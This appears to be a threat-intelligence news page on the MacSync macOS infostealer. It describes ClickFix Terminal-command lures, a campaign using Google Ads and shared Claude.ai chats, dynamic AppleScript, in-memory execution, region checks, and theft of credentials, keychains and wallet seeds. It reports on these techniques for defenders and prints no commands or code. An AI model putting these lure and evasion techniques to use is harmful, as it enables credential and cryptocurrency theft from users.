Find notable cyber news and cases, enriched with sources, timelines, and signals.
Home Browse News Feed Stats Watchlists Beta About Contact

MacSync macOS infostealer with dynamic AppleScript and in-memory execution

Malware Activity
First reported
Last updated
Happening score
H score 33
2 unique sources, 2 articles

Summary

Hide ▲

The MacSync macOS infostealer now uses dynamic AppleScript payloads and in-memory execution to reduce static detection and complicate response. It is being delivered through ClickFix lures that trick users into running terminal commands, increasing the risk of theft on macOS systems. The malware can steal credentials, files, keychain databases, and crypto-wallet seed phrases, making the latest variant especially risky for high-value users.

Related Happenings

SHub Reaper macOS infostealer variant

Malware Activity
First: 19.05.2026 00:42 Last: 19.05.2026 00:42 Sources 1

About this happening: The **SHub Reaper** macOS infostealer now uses **AppleScript** and a fake **Apple security update** lure to infect Macs, raising the risk of credential theft and remote access. It...

Open Happening

ClickFix attacks with PySoxy scheduled-task persistence

Malware Activity
First: 12.05.2026 15:00 Last: 12.05.2026 15:00 Sources 1

About this happening: Cybercriminals are combining **ClickFix** with **PySoxy** to preserve access on victim machines, letting activity restart even after removal attempts. The setup uses a **Python SO...

Open Happening

Vidar Stealer ClickFix campaign targeting multiple sectors

Campaign
First: 08.05.2026 14:00 Last: 08.05.2026 14:00 Sources 1

About this happening: The **Vidar Stealer** campaign is using **ClickFix** social engineering and compromised **WordPress** sites to deliver password-stealing malware, widening risk for **infrastructur...

Open Happening

ACSC ClickFix mitigation guidance for Vidar Stealer

Advisory/Mitigation
First: 07.05.2026 21:00 Last: 07.05.2026 21:00 Sources 1

About this happening: The **ACSC** issued mitigation guidance for an **ongoing ClickFix campaign** that is pushing **Vidar Stealer** through **malicious PowerShell commands**, increasing credential-the...

Open Happening

MacOS living-off-the-land analysis exposing native-feature abuse

Technical Analysis
First: 22.04.2026 19:30 Last: 22.04.2026 19:30 Sources 1

About this happening: Native macOS features are now being repurposed for **code execution**, **lateral movement**, and **evasion**, widening detection gaps across enterprise Apple fleets. The analysis...

Open Happening

Timeline

  1. 10.05.2026 20:52 1 articles · 17d ago

    MacSync campaign abuses Google Ads and Claude.ai chats

    Campaign Scope Update

    A MacSync macOS infostealer campaign is abusing Google Ads and legitimate Claude.ai shared chats to lure users searching for "Claude mac download" into following Terminal instructions that download and run malware on their Mac. One observed variant uses polymorphic delivery, checks for Russian or CIS-region keyboard input sources and sends a cis_blocked ping before exiting, then profiles the victim with external IP address, hostname, OS version, and keyboard locale before using osascript to run a second-stage payload; another variant skips profiling and exfiltrates browser credentials, cookies, and macOS Keychain contents.

    Show sources
    Open in new tab
  2. 16.03.2026 13:41 2 articles · 2mo ago

    MacSync macOS infostealer with dynamic AppleScript and in-memory execution

    Initial Disclosure

    MacSync was first pushed through **ClickFix** lures that used fake install flows and Terminal commands to make victims run the payload. The latest phase adds **dynamic AppleScript** and **in-memory execution**, strengthening evasion while preserving theft of sensitive macOS data.

    Show sources
    Open in new tab